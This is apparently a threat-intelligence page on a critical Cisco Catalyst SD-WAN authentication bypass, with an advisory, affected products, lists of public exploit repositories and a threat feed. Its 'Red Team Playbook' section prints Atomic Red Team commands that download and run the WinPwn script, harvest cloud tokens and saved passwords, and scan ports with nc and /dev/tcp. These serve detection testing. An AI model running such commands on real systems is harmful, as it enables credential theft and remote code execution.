CVE-2026-20127
Overview
This vulnerability is an authentication bypass affecting the peering authentication mechanism in Cisco Catalyst SD-WAN Controller and Manager components. The root cause lies in improper validation of authentication requests during the peering process, which fails to enforce correct credentials. This flaw resides specifically within the peering authentication subsystem responsible for establishing trust between SD-WAN nodes.
Vulnerability Description
A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, and Cisco Catalyst SD-WAN Validator, formerly SD-WAN vBond, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not working properly. An attacker could exploit this vulnerability by sending crafted requests to an affected system. A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-root user account. Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric.
Impact
An unauthenticated remote attacker can exploit this flaw to gain administrative-level access to the affected Cisco Catalyst SD-WAN system. With this access, the attacker can manipulate network configurations via NETCONF, potentially disrupting SD-WAN fabric operations or redirecting traffic. No prior authentication or user interaction is required, enabling full system compromise and lateral movement within the network infrastructure managed by the vulnerable SD-WAN components.
Solution
Cisco has released security updates addressing this vulnerability in Cisco Catalyst SD-WAN Manager version 20.12.6 and later. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-sdwan-rpa-EHchtZk available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk. Following the vendor guidance ensures the authentication mechanism is properly enforced, mitigating the risk of unauthorized access.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability exists within the peering authentication mechanism of the Cisco Catalyst SD-WAN Controller and SD-WAN Manager, which could allow an unauthenticated remote attacker to bypass authentication protocols. This flaw stems from improper functioning of the authentication system, enabling attackers to send specially crafted requests to the affected devices. If successfully exploited, the attacker could gain access to the system as a high-privileged non-root user account. This access would permit manipulation of the network configuration through NETCONF, a protocol used for managing network devices, thereby compromising the integrity and security of the entire SD-WAN fabric.
The attack vectors associated with this vulnerability are particularly concerning due to the ease with which an attacker could exploit them. An attacker could initiate a remote attack without requiring any form of authentication, making it accessible to individuals with minimal technical expertise. By crafting specific requests that exploit the authentication flaw, the attacker could effectively impersonate an internal user, gaining unauthorized access to sensitive configurations and controls. This could lead to a range of malicious activities, such as altering routing policies, intercepting data traffic, or even launching further attacks on connected systems. The potential for lateral movement within the network increases the severity of the threat, as the attacker could pivot to other critical systems once inside the SD-WAN environment.
The real-world implications of this vulnerability are significant, particularly for organizations relying on Cisco's SD-WAN solutions for their network infrastructure. The ability to manipulate network configurations could lead to severe disruptions in service, data breaches, and unauthorized access to sensitive information. Businesses could face operational downtime, financial losses, and reputational damage as a result of such an incident. Furthermore, regulatory compliance issues may arise if sensitive data is compromised, leading to legal repercussions and potential fines. The high CVSS score of 10.0 underscores the critical nature of this vulnerability, indicating that organizations must prioritize its remediation to safeguard their networks.
Detection and mitigation strategies for this vulnerability should focus on both proactive and reactive measures. Organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their SD-WAN infrastructure. Implementing robust logging and monitoring solutions can help detect unusual access patterns or unauthorized configuration changes, enabling timely responses to potential threats. Additionally, organizations should ensure that all affected products are updated to the latest versions, which may include patches or fixes addressing the authentication flaw. Employing network segmentation can also limit the potential impact of an exploit, reducing the attack surface and containing any breaches that may occur.
In conclusion, the vulnerability in the peering authentication mechanism of the Cisco Catalyst SD-WAN Controller and Manager presents a serious risk to organizations utilizing these products. The ease of exploitation, coupled with the potential for significant impact, necessitates immediate attention from cybersecurity professionals. By implementing effective detection and mitigation strategies, organizations can better protect their networks from unauthorized access and maintain the integrity of their SD-WAN environments. As the threat landscape continues to evolve, staying vigilant and proactive in addressing such vulnerabilities is essential for safeguarding critical infrastructure.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2026-20127, rising by over 80% to place this vulnerability near the top percentile of likely exploitation. This shift coincides with the emergence of multiple new proof-of-concept exploits publicly available on prominent code repositories, broadening the exploit landscape and lowering the technical barrier for adversaries. Despite a noticeable decline in detection activity across our telemetry, the expanded availability of exploitation tools suggests that threat actors are refining their capabilities, potentially adopting more covert or targeted approaches. While no confirmed ransomware campaigns have been linked to this vulnerability, the association with the akira group remains under observation. Collectively, these developments elevate the threat level, underscoring an increased risk of unauthorized administrative access via authentication bypass in Cisco Catalyst SD-WAN environments. Defenders should recognize that the vulnerability’s exploitation likelihood has materially increased, warranting heightened vigilance even as direct detection signals appear subdued.
Update 2 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-20127, reflected by a sharp increase in telemetry activity. This surge coincides with the emergence of several new proof-of-concept exploits publicly available on multiple platforms, broadening the accessibility of attack tools to a wider range of threat actors. Although ransomware campaigns remain unconfirmed, the persistent association with the akira group continues to warrant close monitoring, as their tactics could evolve to incorporate this vulnerability more aggressively. The elevated exploitation activity signals a heightened risk of unauthorized administrative access via authentication bypass in Cisco Catalyst SD-WAN environments. Consequently, the threat level has increased from high to critical, underscoring the urgency for defenders to intensify detection and response efforts despite the absence of confirmed ransomware deployment.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | 20.12.6 |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:20.12.6:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | All |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | All |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | All |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | All |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:*:*:*:*:*:*:*:*
|
|
|
Cisco | Sd-Wan Vsmart Controller | 20.12.6 |
cpe:2.3:a:cisco:sd-wan_vsmart_controller:20.12.6:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco Catalyst SD-WAN Controller Authentication Bypass
auxiliary/admin/networking/cisco_sdwan_auth_bypass
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE
|
zerozenxlabs | 31 | 10 | 2026-03-04 | View |
|
sfewer-r7/CVE-2026-20127
An exploit for the Cisco Catalyst SD-WAN Controller authentication bypass vulnerability, CVE-2026-20127
|
sfewer-r7 | 23 | 1 | 2026-03-09 | View |
|
BugFor-Pings/CVE-2026-20127_EXP
Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)利用EXP
|
BugFor-Pings | 4 | 2 | 2026-03-05 | View |
|
yonathanpy/CVE-2026-20127-Cisco-SD-WAN-Preauth-RCE
|
yonathanpy | 2 | 1 | 2026-03-07 | View |
|
gigachadusers/cve-2026-20127
|
gigachadusers | 1 | 0 | 2026-04-15 | View |
|
0xBlackash/CVE-2026-20127
CVE-2026-20127
|
0xBlackash | 0 | 0 | 2026-06-14 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
randeepajayasekara/CVE-2026-20127
Walkthrough of the CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN from first malformed peering request to root...
|
randeepajayasekara | 0 | 0 | 2026-03-04 | View |
|
abrahamsurf/sdwan-scanner-CVE-2026-20127
Cisco SD-WAN Exposure & Potential Vulnerability Scanner (Passive Fingerprinting) 2026
|
abrahamsurf | 0 | 0 | 2026-03-08 | View |
Threat Feed
22 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20127 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20127 |